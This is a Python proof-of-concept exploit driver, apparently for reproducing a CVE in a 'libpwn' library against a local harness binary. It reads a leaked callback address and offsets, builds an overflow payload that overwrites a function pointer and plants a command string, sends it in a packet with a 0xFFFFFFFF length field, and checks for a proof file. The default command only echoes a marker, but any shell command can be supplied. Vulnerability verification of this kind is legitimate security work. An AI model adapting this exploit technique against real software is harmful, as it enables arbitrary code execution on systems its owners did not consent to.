132 lines
3.7 KiB
Python
132 lines
3.7 KiB
Python
#!/usr/bin/env python3
|
|
import argparse
|
|
import os
|
|
import re
|
|
import struct
|
|
import subprocess
|
|
import sys
|
|
from pathlib import Path
|
|
|
|
|
|
PACKET_LENGTH = 0xFFFFFFFF
|
|
|
|
|
|
def repo_root():
|
|
return Path(__file__).resolve().parent.parent
|
|
|
|
|
|
def default_harness_path():
|
|
suffix = ".exe" if os.name == "nt" else ""
|
|
return Path(__file__).resolve().parent / f"libpwn_local_rce_harness{suffix}"
|
|
|
|
|
|
def default_proof_path():
|
|
return Path(__file__).resolve().parent / "libpwn_rce_proof.txt"
|
|
|
|
|
|
def default_command(proof_path):
|
|
marker = "libpwn-rce-verified"
|
|
if os.name == "nt":
|
|
return f"cmd /c echo {marker}>{proof_path}"
|
|
return f"/bin/sh -c 'echo {marker} > {proof_path}'"
|
|
|
|
|
|
def parse_leak(line):
|
|
pattern = (
|
|
r"exec_callback=(0x[0-9a-fA-F]+|[0-9a-fA-F]+)\s+"
|
|
r"callback_offset=(\d+)\s+"
|
|
r"command_offset=(\d+)\s+"
|
|
r"ptr_size=(\d+)"
|
|
)
|
|
match = re.search(pattern, line)
|
|
if not match:
|
|
raise ValueError(f"could not parse leak line: {line!r}")
|
|
return {
|
|
"exec_callback": int(match.group(1), 16),
|
|
"callback_offset": int(match.group(2)),
|
|
"command_offset": int(match.group(3)),
|
|
"ptr_size": int(match.group(4)),
|
|
}
|
|
|
|
|
|
def pack_ptr(value, ptr_size):
|
|
if ptr_size == 8:
|
|
return struct.pack("<Q", value)
|
|
if ptr_size == 4:
|
|
return struct.pack("<I", value)
|
|
raise ValueError(f"unsupported pointer size {ptr_size}")
|
|
|
|
|
|
def build_payload(leak, command):
|
|
command_bytes = command.encode() + b"\x00"
|
|
end = leak["command_offset"] + len(command_bytes)
|
|
payload = bytearray(b"A" * end)
|
|
payload[leak["callback_offset"]:leak["callback_offset"] + leak["ptr_size"]] = (
|
|
pack_ptr(leak["exec_callback"], leak["ptr_size"])
|
|
)
|
|
payload[leak["command_offset"]:leak["command_offset"] + len(command_bytes)] = command_bytes
|
|
return bytes(payload)
|
|
|
|
|
|
def build_wire(payload):
|
|
return struct.pack(">II", PACKET_LENGTH, len(payload)) + payload
|
|
|
|
|
|
def run_exploit(args):
|
|
harness = Path(args.harness).resolve()
|
|
proof = Path(args.proof).resolve()
|
|
if proof.exists():
|
|
proof.unlink()
|
|
|
|
proc = subprocess.Popen(
|
|
[str(harness)],
|
|
stdin=subprocess.PIPE,
|
|
stdout=subprocess.PIPE,
|
|
stderr=subprocess.STDOUT,
|
|
cwd=str(repo_root()),
|
|
text=False,
|
|
)
|
|
|
|
try:
|
|
leak_line = proc.stdout.readline().decode(errors="replace").strip()
|
|
leak = parse_leak(leak_line)
|
|
command = args.command or default_command(proof)
|
|
payload = build_payload(leak, command)
|
|
wire = build_wire(payload)
|
|
proc.stdin.write(wire)
|
|
proc.stdin.close()
|
|
output = proc.stdout.read().decode(errors="replace")
|
|
rc = proc.wait(timeout=args.timeout)
|
|
finally:
|
|
if proc.poll() is None:
|
|
proc.kill()
|
|
|
|
print(leak_line)
|
|
print(output, end="")
|
|
print(f"process_rc={rc}")
|
|
print(f"payload_len={len(payload)}")
|
|
print(f"proof_path={proof}")
|
|
|
|
if rc != 0:
|
|
raise SystemExit("FAIL: harness exited non-zero")
|
|
if not proof.exists():
|
|
raise SystemExit("FAIL: proof file was not created")
|
|
proof_text = proof.read_text(errors="replace").strip()
|
|
if "libpwn-rce-verified" not in proof_text:
|
|
raise SystemExit(f"FAIL: unexpected proof file content: {proof_text!r}")
|
|
print("RCE_PROOF=PASS")
|
|
|
|
|
|
def main():
|
|
parser = argparse.ArgumentParser(description="Local RCE proof driver for the libpwn CVE harness.")
|
|
parser.add_argument("--harness", default=str(default_harness_path()))
|
|
parser.add_argument("--proof", default=str(default_proof_path()))
|
|
parser.add_argument("--command", default="")
|
|
parser.add_argument("--timeout", type=float, default=10.0)
|
|
args = parser.parse_args()
|
|
run_exploit(args)
|
|
|
|
|
|
if __name__ == "__main__":
|
|
main()
|